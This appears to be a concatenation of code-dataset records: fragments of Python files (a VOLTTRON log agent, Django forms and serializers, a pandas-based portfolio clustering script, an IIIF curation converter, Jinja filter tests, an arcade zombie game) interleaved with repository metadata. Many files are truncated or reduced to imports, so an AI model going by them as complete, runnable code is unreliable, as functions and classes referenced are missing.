] | null | null | null | services/ops/LogStatisticsAgent/logstatisticsagent/agent.py | gnmerritt/volttron | ebfbf62bab77d46fd3e8d6aaca1fc4f33932ccf3 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*- {{{
# vim: set fenc=utf-8 ft=python sw=4 ts=4 sts=4 et:
#
# Copyright 2019, Battelle Memorial Institute.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# This material was prepared as an account of work sponsored by an agency of
# the United States Government. Neither the United States Government nor the
# United States Department of Energy, nor Battelle, nor any of their
# employees, nor any jurisdiction or organization that has cooperated in the
# development of these materials, makes any warranty, express or
# implied, or assumes any legal liability or responsibility for the accuracy,
# completeness, or usefulness or any information, apparatus, product,
# software, or process disclosed, or represents that its use would not infringe
# privately owned rights. Reference herein to any specific commercial product,
# process, or service by trade name, trademark, manufacturer, or otherwise
# does not necessarily constitute or imply its endorsement, recommendation, or
# favoring by the United States Government or any agency thereof, or
# Battelle Memorial Institute. The views and opinions of authors expressed
# herein do not necessarily state or reflect those of the
# United States Government or any agency thereof.
#
# PACIFIC NORTHWEST NATIONAL LABORATORY operated by
# BATTELLE for the UNITED STATES DEPARTMENT OF ENERGY
# under Contract DE-AC05-76RL01830
# }}}
import datetime
import logging
import os
import sys
import statistics
from volttron.platform.vip.agent import Agent, RPC, Core
from volttron.platform.agent import utils
from volttron.platform.agent.utils import get_aware_utc_now
utils.setup_logging()
_log = logging.getLogger(__name__)
__version__ = '1.0'
def log_statistics(config_path, **kwargs):
"""Load the LogStatisticsAgent agent configuration and returns and instance
of the agent created using that configuration.
:param config_path: Path to a configuration file.
:type config_path: str
:returns: LogStatisticsAgent agent instance
:rtype: LogStatisticsAgent agent
"""
config = utils.load_config(config_path)
return LogStatisticsAgent(config, **kwargs)
def main(argv=sys.argv):
"""Main method called by the platform."""
utils.vip_main(log_statistics, identity='platform.logstatisticsagent')
if __name__ == '__main__':
# Entry point for script
try:
sys.exit(main())
except KeyboardInterrupt:
pass
| 38.885714 | 103 | 0.680235 |
fe83754072cf9c384870b3ad7538706613b6e5d9 | 675 | py | Python | apps/inventory/serializers.py | sseits-skku/its-backend | faf020568b930aaff4958d47602c511aad8a6c8e | [
"MIT"
] | null | null | null | apps/inventory/serializers.py | sseits-skku/its-backend | faf020568b930aaff4958d47602c511aad8a6c8e | [
"MIT"
] | 8 | 2020-06-05T23:00:49.000Z | 2022-03-11T23:59:32.000Z | apps/inventory/serializers.py | sseits-skku/its-backend | faf020568b930aaff4958d47602c511aad8a6c8e | [
"MIT"
] | 1 | 2019-10-01T13:07:22.000Z | 2019-10-01T13:07:22.000Z | from rest_framework.serializers import ModelSerializer
from .models import Place, Status, OSType, Stock, ComputerStock
| 19.852941 | 63 | 0.675556 |
fe86745dc1d7b386636a2027dae3d2552bd3e833 | 2,412 | py | Python | test/dict_parameter_test.py | shouldsee/luigi | 54a347361ae1031f06105eaf30ff88f5ef65b00c | [
"Apache-2.0"
] | 14,755 | 2015-01-01T09:33:34.000Z | 2022-03-31T15:38:39.000Z | test/dict_parameter_test.py | shouldsee/luigi | 54a347361ae1031f06105eaf30ff88f5ef65b00c | [
"Apache-2.0"
] | 2,387 | 2015-01-01T09:16:13.000Z | 2022-03-12T13:55:43.000Z | test/dict_parameter_test.py | shouldsee/luigi | 54a347361ae1031f06105eaf30ff88f5ef65b00c | [
"Apache-2.0"
] | 2,630 | 2015-01-02T06:11:32.000Z | 2022-03-27T22:11:20.000Z | # -*- coding: utf-8 -*-
#
# Copyright 2012-2015 Spotify AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from helpers import unittest, in_parse
import luigi
import luigi.interface
import json
import collections
| 37.6875 | 105 | 0.679934 |
fe87946e35b940790f2abaab6a2a55e9294ad44f | 7,305 | py | Python | echoscope/source/mysql_source.py | treeyh/echoscope | ef8933ce9a5dfe2ac8fb6e82bad8d5fa0d72a6da | [
"MIT"
] | 1 | 2022-01-18T09:19:38.000Z | 2022-01-18T09:19:38.000Z | echoscope/source/mysql_source.py | treeyh/echoscope | ef8933ce9a5dfe2ac8fb6e82bad8d5fa0d72a6da | [
"MIT"
] | null | null | null | echoscope/source/mysql_source.py | treeyh/echoscope | ef8933ce9a5dfe2ac8fb6e82bad8d5fa0d72a6da | [
"MIT"
] | 1 | 2022-01-18T09:19:39.000Z | 2022-01-18T09:19:39.000Z | # -*- coding: UTF-8 -*-
import logging
from typing import List
from echoscope.config import config
from echoscope.util import mysql_util, str_util, log_util
from echoscope.model import ds_model, config_model
from echoscope.source import source
| 39.701087 | 411 | 0.675975 |
fe87ead9a791db821c1f883b4076bac8b4dc4efb | 99,064 | py | Python | lib/XChemPANDDA.py | graeme-winter/XChemExplorer | 7b0779387705ab37074d80f77baf22891eb56907 | [
"MIT"
] | 2 | 2018-03-11T08:38:43.000Z | 2021-09-25T07:46:44.000Z | lib/XChemPANDDA.py | graeme-winter/XChemExplorer | 7b0779387705ab37074d80f77baf22891eb56907 | [
"MIT"
] | 208 | 2017-06-30T10:32:12.000Z | 2022-03-29T10:38:32.000Z | lib/XChemPANDDA.py | graeme-winter/XChemExplorer | 7b0779387705ab37074d80f77baf22891eb56907 | [
"MIT"
] | 6 | 2017-06-01T20:33:31.000Z | 2021-10-04T09:44:09.000Z | # last edited: 10/08/2017, 10:25
import os, sys, glob, subprocess
from datetime import datetime
from PyQt4 import QtGui, QtCore
import math
#from XChemUtils import mtztools
import XChemDB
import XChemRefine
import XChemUtils
import XChemLog
import XChemToolTips
import csv
try:
import gemmi
import pandas
except ImportError:
pass
#def get_names_of_current_clusters(xce_logfile,panddas_directory):
# Logfile=XChemLog.updateLog(xce_logfile)
# Logfile.insert('parsing {0!s}/cluster_analysis'.format(panddas_directory))
# os.chdir('{0!s}/cluster_analysis'.format(panddas_directory))
# cluster_dict={}
# for out_dir in sorted(glob.glob('*')):
# if os.path.isdir(out_dir):
# cluster_dict[out_dir]=[]
# found_first_pdb=False
# for folder in glob.glob(os.path.join(out_dir,'pdbs','*')):
# xtal=folder[folder.rfind('/')+1:]
# if not found_first_pdb:
# if os.path.isfile(os.path.join(panddas_directory,'cluster_analysis',out_dir,'pdbs',xtal,xtal+'.pdb') ):
# cluster_dict[out_dir].append(os.path.join(panddas_directory,'cluster_analysis',out_dir,'pdbs',xtal,xtal+'.pdb'))
# found_first_pdb=True
# cluster_dict[out_dir].append(xtal)
# return cluster_dict
| 50.594484 | 265 | 0.589447 |
fe8a256140b6390c55cadca6d58880f260544702 | 5,253 | py | Python | OmegaErp/Apps/base/forms/__init__.py | OMAR-EHAB777/FerpMenu | 6aee4616bc9bc7801023fe51acfa28e1e1267b66 | [
"BSD-3-Clause"
] | null | null | null | OmegaErp/Apps/base/forms/__init__.py | OMAR-EHAB777/FerpMenu | 6aee4616bc9bc7801023fe51acfa28e1e1267b66 | [
"BSD-3-Clause"
] | null | null | null | OmegaErp/Apps/base/forms/__init__.py | OMAR-EHAB777/FerpMenu | 6aee4616bc9bc7801023fe51acfa28e1e1267b66 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Global app forms
"""
# Standard Library
import re
# Django Library
from django import forms
from django.contrib.auth.forms import UserChangeForm, UserCreationForm
from django.utils.translation import ugettext_lazy as _
# Thirdparty Library
from dal import autocomplete
# Localfolder Library
from ..models import PyCompany, PyCountry, PyUser
from .partner import PartnerForm
# ========================================================================== #
# ========================================================================== #
| 26.938462 | 80 | 0.491148 |
fe8a7abf97fc4938deedb4a0e775164e6040fb1b | 1,042 | py | Python | test-drf-project/tests/conftest.py | fvlima/drf-view-profiler | a61d48e9835679f812d69d24ea740b947836108c | [
"MIT"
] | 30 | 2019-10-16T12:48:16.000Z | 2021-11-23T08:57:27.000Z | test-drf-project/tests/conftest.py | fvlima/drf-view-profiler | a61d48e9835679f812d69d24ea740b947836108c | [
"MIT"
] | null | null | null | test-drf-project/tests/conftest.py | fvlima/drf-view-profiler | a61d48e9835679f812d69d24ea740b947836108c | [
"MIT"
] | 1 | 2021-11-23T07:28:04.000Z | 2021-11-23T07:28:04.000Z | from unittest import mock
import pytest
from django.http import HttpRequest
from rest_framework.response import Response
from rest_framework.test import APIClient
from drf_viewset_profiler.middleware import LineProfilerViewSetMiddleware
| 24.809524 | 100 | 0.794626 |
fe8b3957ceddf0ec804e544f4e167363b9d84f54 | 3,553 | py | Python | Examples/VirtualLab/virtual_experiment_f.py | diehlpk/muDIC | b5d90aa62267b4bd0b88ae0a989cf09a51990654 | [
"MIT"
] | 70 | 2019-04-15T08:08:23.000Z | 2022-03-23T08:24:25.000Z | Examples/VirtualLab/virtual_experiment_f.py | diehlpk/muDIC | b5d90aa62267b4bd0b88ae0a989cf09a51990654 | [
"MIT"
] | 34 | 2019-05-03T18:09:43.000Z | 2022-02-10T11:36:29.000Z | Examples/VirtualLab/virtual_experiment_f.py | diehlpk/muDIC | b5d90aa62267b4bd0b88ae0a989cf09a51990654 | [
"MIT"
] | 37 | 2019-04-25T15:39:23.000Z | 2022-03-28T21:40:24.000Z | # This allows for running the example when the repo has been cloned
import sys
from os.path import abspath
sys.path.extend([abspath(".")])
# Example code follows
import logging
import numpy as np
import matplotlib.pyplot as plt
import muDIC.vlab as vlab
import muDIC as dic
"""
This example case runs an experiment where a deformation gradient is used
to deform a synthetically generated speckle, the speckle is then down sampled by a factor of four
and sensor artifacts are included.
The analysis is then performed and the resulting deformation gradient field is compared to the
one used to deform the images
"""
# Set the amount of info printed to terminal during analysis
logging.basicConfig(format='%(name)s:%(levelname)s:%(message)s', level=logging.INFO)
show_results = False
# Define the image you want to analyse
n_imgs = 2
image_shape = (500, 500)
downsample_factor = 4
super_image_shape = tuple(dim * downsample_factor for dim in image_shape)
# Make a speckle image
speckle_image = vlab.rosta_speckle(super_image_shape, dot_size=4, density=0.5, smoothness=2.0)
# Make an image deformed
F = np.array([[1.01,0],[0.01,1.0]])
image_deformer = vlab.imageDeformer_from_defGrad(F)
# Make an image down-sampler including downscaling, fill-factor and sensor grid irregularities
downsampler = vlab.Downsampler(image_shape=super_image_shape, factor=downsample_factor, fill=.95,
pixel_offset_stddev=0.05)
# Make a noise injector producing 2% gaussian additive noise
noise_injector = vlab.noise_injector("gaussian", sigma=.02)
# Make an synthetic image generation pipeline
image_generator = vlab.SyntheticImageGenerator(speckle_image=speckle_image, image_deformer=image_deformer,
downsampler=downsampler, noise_injector=noise_injector, n=n_imgs)
# Put it into an image stack
image_stack = dic.ImageStack(image_generator)
# Now, make a mesh. Make sure to use enough elements
mesher = dic.Mesher(deg_n=3, deg_e=3,type="spline")
#mesh = mesher.mesh(image_stack) # Use this if you want to use a GUI
mesh = mesher.mesh(image_stack,Xc1=50,Xc2=450,Yc1=50,Yc2=450,n_ely=8,n_elx=8, GUI=False)
# Prepare the analysis input and initiate the analysis
input = dic.DICInput(mesh, image_stack)
input.tol = 1e-6
input.interpolation_order = 4
dic_job = dic.DICAnalysis(input)
results = dic_job.run()
# Calculate the fields for later use. Seed is used when spline elements are used and upscale is used for Q4.
fields = dic.Fields(results, seed=101,upscale=10)
# We will now compare the results from the analysis to the deformation gradient which the image was deformed by
if show_results:
plt.figure()
plt.imshow(F[0,0] - fields.F()[0, 0,0, :, :, 1], cmap=plt.cm.magma)
plt.xlabel("Element e-coordinate")
plt.ylabel("Element n-coordinate")
plt.colorbar()
plt.title("Difference in deformation gradient component 0,0 within the element")
fig1 = plt.figure()
ax1 = fig1.add_subplot(111)
#line1 = ax1.plot(res_field[:, 50], label="correct")
line2 = ax1.plot(fields.F()[0, 0,0, :, 50, 1], label="DIC")
ax1.set_xlabel("element e-coordinate")
ax1.set_ylabel("Deformation gradient component 0,0 []")
ax2 = fig1.add_subplot(111, sharex=ax1, frameon=False)
line3 = ax2.plot(F[0,0] - fields.F()[0, 0,0, :, 50, 1], "r--", label="difference")
ax2.yaxis.tick_right()
ax2.yaxis.set_label_position("right")
ax2.set_ylabel("Deviation []")
plt.title("Deformation gradient component 0,0")
fig1.legend()
plt.show()
| 36.628866 | 112 | 0.731776 |
fe8b6fcdfeb01114b63f0a0d1b3c6d4bd1396297 | 81 | py | Python | src/template_config.py | ckaestne/toxicity-detector | bb00ffe4470c6c1a2f561212d487d56eab5a5da7 | [
"MIT"
] | 7 | 2020-03-03T18:09:48.000Z | 2022-03-23T16:55:26.000Z | src/template_config.py | ckaestne/toxicity-detector | bb00ffe4470c6c1a2f561212d487d56eab5a5da7 | [
"MIT"
] | 67 | 2020-06-09T23:57:49.000Z | 2022-02-05T19:09:49.000Z | src/template_config.py | sophieball/toxicity-detector | 7c07c5e6a6915428fdae64cbd3bc07caa697774e | [
"MIT"
] | 6 | 2020-02-21T00:19:57.000Z | 2022-03-03T23:00:42.000Z | mongo = { "user": "", "passwd": "", "db": "ghtorrent" }
perspective_api_key = ""
| 27 | 55 | 0.555556 |
fe8c212fdb626e028311eb927a139fd3cc7bba51 | 1,455 | py | Python | tests/unit/dataactvalidator/test_fabs38_detached_award_financial_assistance_2.py | COEJKnight/one | 6a5f8cd9468ab368019eb2597821b7837f74d9e2 | [
"CC0-1.0"
] | 1 | 2018-10-29T12:54:44.000Z | 2018-10-29T12:54:44.000Z | tests/unit/dataactvalidator/test_fabs38_detached_award_financial_assistance_2.py | COEJKnight/one | 6a5f8cd9468ab368019eb2597821b7837f74d9e2 | [
"CC0-1.0"
] | null | null | null | tests/unit/dataactvalidator/test_fabs38_detached_award_financial_assistance_2.py | COEJKnight/one | 6a5f8cd9468ab368019eb2597821b7837f74d9e2 | [
"CC0-1.0"
] | null | null | null | from tests.unit.dataactcore.factories.staging import DetachedAwardFinancialAssistanceFactory
from tests.unit.dataactvalidator.utils import number_of_errors, query_columns
_FILE = 'fabs38_detached_award_financial_assistance_2'
def test_success(database):
""" AwardingOfficeCode must be six characters long. """
det_award_1 = DetachedAwardFinancialAssistanceFactory(awarding_office_code='AAAAAA')
det_award_2 = DetachedAwardFinancialAssistanceFactory(awarding_office_code='111111')
det_award_3 = DetachedAwardFinancialAssistanceFactory(awarding_office_code='AAA111')
det_award_4 = DetachedAwardFinancialAssistanceFactory(awarding_office_code='')
det_award_5 = DetachedAwardFinancialAssistanceFactory(awarding_office_code=None)
errors = number_of_errors(_FILE, database, models=[det_award_1, det_award_2, det_award_3, det_award_4, det_award_5])
assert errors == 0
def test_failure(database):
""" AwardingOfficeCode must be six characters long. """
det_award_1 = DetachedAwardFinancialAssistanceFactory(awarding_office_code='AAAA1')
det_award_2 = DetachedAwardFinancialAssistanceFactory(awarding_office_code='AAAAAAA')
errors = number_of_errors(_FILE, database, models=[det_award_1, det_award_2])
assert errors == 2
| 45.46875 | 120 | 0.808935 |
fe8d5aa19fb8f623818fa75491db0f6d028311d8 | 3,203 | py | Python | Optimisation Portfolios/HERC.py | BrandonAFong/Ideas | 5d38be2dfaba12a534220e3f28a6c9da9aefcdec | [
"MIT"
] | null | null | null | Optimisation Portfolios/HERC.py | BrandonAFong/Ideas | 5d38be2dfaba12a534220e3f28a6c9da9aefcdec | [
"MIT"
] | null | null | null | Optimisation Portfolios/HERC.py | BrandonAFong/Ideas | 5d38be2dfaba12a534220e3f28a6c9da9aefcdec | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Aug 31 22:48:21 2021
@author: apple
"""
import numpy as np
import pandas as pd
from HRP import seriation
import fastcluster
from scipy.cluster.hierarchy import fcluster
from gap_statistic import OptimalK
from backtest import df_to_matrix
#HERC
#Dataframe of returns
| 28.345133 | 84 | 0.609429 |
fe8e1c215219c1805761ef6232ba7b858bfbd7b4 | 3,641 | py | Python | src/conv/convertManifest2Curation.py | nakamura196/i3 | 16d7695e5412b45dc8e0192d9ca285723ac9f788 | [
"Apache-2.0"
] | 3 | 2020-04-21T11:36:10.000Z | 2022-02-01T00:46:59.000Z | src/conv/convertManifest2Curation.py | nakamura196/i3 | 16d7695e5412b45dc8e0192d9ca285723ac9f788 | [
"Apache-2.0"
] | 17 | 2021-01-08T17:20:38.000Z | 2021-06-29T05:55:47.000Z | src/conv/convertManifest2Curation.py | nakamura196/i3 | 16d7695e5412b45dc8e0192d9ca285723ac9f788 | [
"Apache-2.0"
] | null | null | null | import urllib.request
from bs4 import BeautifulSoup
import csv
import requests
import os
import json
import time
import glob
files = glob.glob("/Users/nakamura/git/d_iiif/iiif/src/collections/nijl/data/json/*.json")
for i in range(len(files)):
file = files[i]
file_id = file.split("/")[-1].replace(".json", "")
opath = "/Users/nakamura/git/d_iiif/iiif/src/collections/nijl/data/curation/"+file_id+".json"
if not os.path.exists(opath):
fw = open(opath, 'w')
curation_data = {}
curation_uri = "curation:"+file_id+".json"
with open(file) as f:
try:
df = json.load(f)
except:
continue
anno_count = 1
if "sequences" in df:
print(file)
members = []
canvases = df["sequences"][0]["canvases"]
for j in range(len(canvases)):
canvas = canvases[j]
if "otherContent" in canvas:
id = canvas["otherContent"][0]["@id"]
headers = {"content-type": "application/json"}
# time.sleep(0.5)
r = requests.get(id, headers=headers)
data = r.json()
print(id)
resources = data["resources"]
for resource in resources:
member_id = resource["on"]
res = resource["resource"]
chars = res["chars"]
member = {
"@id": member_id,
"@type": "sc:Canvas",
"label": "[Annotation " + str(anno_count) + "]",
"description": chars,
"metadata": [
{
"label": res["@type"],
"value": chars
}
]
}
anno_count += 1
members.append(member)
if len(members) > 0:
label = ""
if "label" in df:
label = df["label"]
curation_data = {
"@context": [
"http://iiif.io/api/presentation/2/context.json",
"http://codh.rois.ac.jp/iiif/curation/1/context.json"
],
"@type": "cr:Curation",
"@id": curation_uri,
"label": "Automatic curation by IIIF Converter",
"selections": [
{
"@id": curation_uri + "/range1",
"@type": "sc:Range",
"label": "Automatic curation by IIIF Converter",
"members": members,
"within": {
"@id": df["@id"],
"@type": "sc:Manifest",
"label": label
}
}
]
}
json.dump(curation_data, fw, ensure_ascii=False, indent=4, sort_keys=True, separators=(',', ': '))
| 31.938596 | 106 | 0.355397 |
fe8e3a04a382b9b727449826066c850475d83dbe | 190 | py | Python | programme.py | GaLaXy102/Vacationing | e476f1047deeca8f68897a497716319afab3e7f0 | [
"MIT"
] | null | null | null | programme.py | GaLaXy102/Vacationing | e476f1047deeca8f68897a497716319afab3e7f0 | [
"MIT"
] | null | null | null | programme.py | GaLaXy102/Vacationing | e476f1047deeca8f68897a497716319afab3e7f0 | [
"MIT"
] | null | null | null | from lib import get_itineraries
import data
if __name__ == '__main__':
for itinerary in get_itineraries(data.sicily):
print("#" * 24)
print(itinerary)
print("")
| 21.111111 | 50 | 0.636842 |
fe908006796adb02dbc2aa1b3ab9fa0ac75b1812 | 5,574 | py | Python | sawyer/mujoco/tasks/transition_pick_and_place_task.py | rlagywjd802/gym-sawyer | 385bbeafcccb61afb9099554f6a99b16f1f1a7c5 | [
"MIT"
] | null | null | null | sawyer/mujoco/tasks/transition_pick_and_place_task.py | rlagywjd802/gym-sawyer | 385bbeafcccb61afb9099554f6a99b16f1f1a7c5 | [
"MIT"
] | null | null | null | sawyer/mujoco/tasks/transition_pick_and_place_task.py | rlagywjd802/gym-sawyer | 385bbeafcccb61afb9099554f6a99b16f1f1a7c5 | [
"MIT"
] | null | null | null | import numpy as np
from sawyer.mujoco.tasks.base import ComposableTask
| 28.880829 | 121 | 0.571582 |
fe90ddd8fb4cfe4289850e4b9709b973ed6310cd | 36,485 | py | Python | tests/app/test_jinja_filters.py | nealedj/eq-survey-runner | b8e6cddae6068f6c8fd60e21d31d58aaa79bbb34 | [
"MIT"
] | null | null | null | tests/app/test_jinja_filters.py | nealedj/eq-survey-runner | b8e6cddae6068f6c8fd60e21d31d58aaa79bbb34 | [
"MIT"
] | 1 | 2018-11-05T12:00:51.000Z | 2018-11-05T12:00:51.000Z | tests/app/test_jinja_filters.py | nealedj/eq-survey-runner | b8e6cddae6068f6c8fd60e21d31d58aaa79bbb34 | [
"MIT"
] | null | null | null | # coding: utf-8
from types import SimpleNamespace
from datetime import datetime, timedelta
from unittest.mock import patch
from dateutil.relativedelta import relativedelta
from jinja2 import Undefined, Markup
from mock import Mock
from app.jinja_filters import (
format_date, format_conditional_date, format_currency, get_currency_symbol,
format_multilined_string, format_percentage, format_date_range,
format_household_member_name, format_datetime,
format_number_to_alphabetic_letter, format_unit, format_currency_for_input,
format_number, format_unordered_list, format_unit_input_label,
format_household_member_name_possessive, concatenated_list,
calculate_years_difference, get_current_date, as_london_tz, max_value,
min_value, get_question_title, get_answer_label,
format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom,
format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list)
from tests.app.app_context_test_case import AppContextTestCase
def test_format_year_month_duration(self):
with self.app_request_context('/'):
self.assertEqual(format_duration({'years': 5, 'months': 4}), '5 years 4 months')
self.assertEqual(format_duration({'years': 5, 'months': 0}), '5 years')
self.assertEqual(format_duration({'years': 0, 'months': 4}), '4 months')
self.assertEqual(format_duration({'years': 1, 'months': 1}), '1 year 1 month')
self.assertEqual(format_duration({'years': 0, 'months': 0}), '0 months')
def test_format_year_duration(self):
with self.app_request_context('/'):
self.assertEqual(format_duration({'years': 5}), '5 years')
self.assertEqual(format_duration({'years': 1}), '1 year')
self.assertEqual(format_duration({'years': 0}), '0 years')
def test_format_month_duration(self):
with self.app_request_context('/'):
self.assertEqual(format_duration({'months': 5}), '5 months')
self.assertEqual(format_duration({'months': 1}), '1 month')
self.assertEqual(format_duration({'months': 0}), '0 months')
def test_format_unordered_list(self):
list_items = [['item 1', 'item 2']]
formatted_value = format_unordered_list(self.autoescape_context, list_items)
expected_value = '<ul><li>item 1</li><li>item 2</li></ul>'
self.assertEqual(expected_value, formatted_value)
def test_format_unordered_list_with_no_input(self):
list_items = []
formatted_value = format_unordered_list(self.autoescape_context, list_items)
self.assertEqual('', formatted_value)
def test_format_unordered_list_with_empty_list(self):
list_items = [[]]
formatted_value = format_unordered_list(self.autoescape_context, list_items)
self.assertEqual('', formatted_value)
def test_max_value(self):
# Given
two_ints = (1, 2)
# When
max_of_two = max_value(*two_ints)
# Then
self.assertEqual(max_of_two, 2)
def test_max_value_none(self):
# Given
one_int = (1, None)
# When
max_of_two = max_value(*one_int)
# Then
self.assertEqual(max_of_two, 1)
def test_max_value_undefined(self):
# Given
args = ('foo', Undefined())
# When
with self.assertRaises(Exception) as exception:
max_value(*args)
# Then
self.assertIn(
"Cannot determine maximum of incompatible types max(<class 'str'>,"
" <class 'jinja2.runtime.Undefined'>)", str(exception.exception))
def test_max_values_incompatible(self):
# Given
args = (1, 'abc')
# When
with self.assertRaises(Exception) as exception:
max_value(*args)
# Then
self.assertIn(
"Cannot determine maximum of incompatible types max(<class 'int'>,"
" <class 'str'>)", str(exception.exception))
def test_max_values_compatible(self):
# Given
args = (-1, True)
# When
max_of_two = max_value(*args)
# Then
self.assertEqual(max_of_two, True)
def test_max_value_str(self):
# Given
two_str = ('a', 'abc')
# When
max_of_two = max_value(*two_str)
# Then
self.assertEqual(max_of_two, 'abc')
def test_max_value_date(self):
# Given
now = datetime.utcnow()
then = now - timedelta(seconds=60)
two_dates = (then, now)
# When
max_of_two = max_value(*two_dates)
# Then
self.assertEqual(max_of_two, now)
def test_min_value(self):
# Given
two_ints = (1, 2)
# When
min_of_two = min_value(*two_ints)
# Then
self.assertEqual(min_of_two, 1)
def test_min_value_none(self):
# Given
one_int = (1, None)
# When
min_of_two = min_value(*one_int)
# Then
self.assertEqual(min_of_two, 1)
def test_min_value_undefined(self):
# Given
args = ('foo', Undefined())
# When
with self.assertRaises(Exception) as exception:
min_value(*args)
# Then
self.assertIn(
"Cannot determine minimum of incompatible types min(<class 'str'>,"
" <class 'jinja2.runtime.Undefined'>)", str(exception.exception))
def test_min_values_incompatible(self):
# Given
args = (1, 'abc')
# When
with self.assertRaises(Exception) as exception:
min_value(*args)
# Then
self.assertIn(
"Cannot determine minimum of incompatible types min(<class 'int'>,"
" <class 'str'>)", str(exception.exception))
def test_min_values_compatible(self):
# Given
args = (-1, True)
# When
min_of_two = min_value(*args)
# Then
self.assertEqual(min_of_two, -1)
def test_min_value_str(self):
# Given
two_str = ('a', 'abc')
# When
min_of_two = min_value(*two_str)
# Then
self.assertEqual(min_of_two, 'a')
def test_min_value_date(self):
# Given
now = datetime.utcnow()
then = now - timedelta(seconds=60)
two_dates = (then, now)
# When
min_of_two = min_value(*two_dates)
# Then
self.assertEqual(min_of_two, then)
def test_get_question_title_with_title_value(self):
    """An explicit 'title' on the question is returned as-is."""
    context = SimpleNamespace(parent={
        'question': {
            'id': 'question',
            'title': 'question_title',
        },
    })
    title = get_question_title(context, 'question')
    self.assertEqual(title, 'question_title')
def test_get_question_title_with_question_titles(self):
    """Without a 'title', the content-level question_titles map is used."""
    context = SimpleNamespace(parent={
        'question': {
            'id': 'question',
        },
        'content': {
            'question_titles': {
                'question': 'default_question_title',
            },
        },
    })
    title = get_question_title(context, 'question')
    self.assertEqual(title, 'default_question_title')
def test_get_answer_label_with_answer_label(self):
    """An explicit 'label' on the matching answer is returned as-is."""
    context = SimpleNamespace(parent={
        'question': {
            'id': 'question',
            'answers': [{
                'id': 'answer',
                'label': 'answer_label',
            }],
        },
    })
    label = get_answer_label(context, 'answer', 'question')
    self.assertEqual(label, 'answer_label')
def test_get_answer_label_with_no_answer_label_and_title(self):
    """Without an answer label, the question's title is used instead."""
    context = SimpleNamespace(parent={
        'question': {
            'id': 'question',
            'title': 'question_title',
            'answers': [{
                'id': 'answer',
            }],
        },
    })
    label = get_answer_label(context, 'answer', 'question')
    self.assertEqual(label, 'question_title')
def test_get_answer_label_with_no_answer_label_and_question_titles(self):
    """Without an answer label or question title, fall back to the
    content-level question_titles map."""
    context = SimpleNamespace(parent={
        'question': {
            'id': 'question',
            'answers': [{
                'id': 'answer',
            }],
        },
        'content': {
            'question_titles': {
                'question': 'default_question_title',
            },
        },
    })
    label = get_answer_label(context, 'answer', 'question')
    self.assertEqual(label, 'default_question_title')
def test_offset_date_from_day(self):
    """Table-driven check of calculate_offset_from_weekday_in_last_whole_week.

    Each case is (input date, offset kwargs, day of week, expected output).
    """
    test_cases = [
        ('2018-08-10', {}, 'SU', '2018-08-05'),  # Friday outputs previous Sunday
        ('2018-08-05', {}, 'SU', '2018-07-29'),  # Sunday outputs previous Sunday (Must be a full Sunday)
        ('2018-08-06', {}, 'SU', '2018-08-05'),  # Monday outputs previous Sunday
        ('2018-08-06', {'days': -1}, 'SU', '2018-08-04'),  # Previous sunday with -1 day offset
        ('2018-08-05', {'weeks': 1}, 'SU', '2018-08-05'),  # Previous sunday with +1 month offset, back to input
        ('2018-08-10', {}, 'FR', '2018-08-03'),  # Friday outputs previous Friday
        ('2018-08-10T13:32:20.365665', {}, 'FR', '2018-08-03'),  # Ensure we can handle datetime input
        ('2018-08-10', {'weeks': 4}, 'FR', '2018-08-31'),  # Friday outputs previous Friday + 4 weeks
        ('2018-08-10', {'bad_period': 4}, 'FR', '2018-08-03'),  # Friday outputs previous Friday + nothing
        ('2018-08-10', {'years': 1}, 'FR', '2019-08-03'),  # Friday outputs previous Friday + 1 year
        ('2018-08-10', {'years': 1, 'weeks': 1, 'days': 1}, 'FR', '2019-08-11'),  # + 1 year + 1 week + 1 day
    ]
    for date_input, offset, weekday, expected in test_cases:
        actual = calculate_offset_from_weekday_in_last_whole_week(
            date_input, offset, weekday)
        self.assertEqual(actual, expected)
| 38.005208 | 143 | 0.615952 |
fe90eb5d4db9dcb42eabad6cf0007baab0fc7833 | 18,598 | py | Python | levels/sombie.py | superhasduper/PythonGames | 64995d3e0b619006a2cf80d0da3c0fdf97db6fd9 | [
"MIT"
] | 1 | 2019-07-07T19:55:39.000Z | 2019-07-07T19:55:39.000Z | levels/sombie.py | superhasduper/PythonGames | 64995d3e0b619006a2cf80d0da3c0fdf97db6fd9 | [
"MIT"
] | null | null | null | levels/sombie.py | superhasduper/PythonGames | 64995d3e0b619006a2cf80d0da3c0fdf97db6fd9 | [
"MIT"
] | null | null | null | import arcade
import os
SPRITE_SCALING = 0.5
SPRITE_NATIVE_SIZE = 128
SPRITE_SIZE = int(SPRITE_NATIVE_SIZE * SPRITE_SCALING)
SCREEN_WIDTH = SPRITE_SIZE * 14
SCREEN_HEIGHT = SPRITE_SIZE * 10
MOVEMENT_SPEED = 5
COIN_SCALE = 0.7
def setup_room_1():
"""
Create and return room 1.
If your program gets large, you may want to separate this into different
files.
"""
room = Room()
""" Set up the game and initialize the variables. """
# Sprite lists
room.wall_list = arcade.SpriteList()
room.door_list = arcade.SpriteList()
room.coin_list = arcade.SpriteList()
room.smallpotion_list = arcade.SpriteList()
room.bigpotion_list = arcade.SpriteList()
for y in (0, SCREEN_HEIGHT - SPRITE_SIZE):
# Loop for each box going across
for x in range(0, SCREEN_WIDTH, SPRITE_SIZE):
wall = arcade.Sprite("gravel_dirt.png", SPRITE_SCALING)
wall.left = x
wall.bottom = y
room.wall_list.append(wall)
# Create left and right column of boxes
for x in (0, SCREEN_WIDTH - SPRITE_SIZE):
# Loop for each box going across
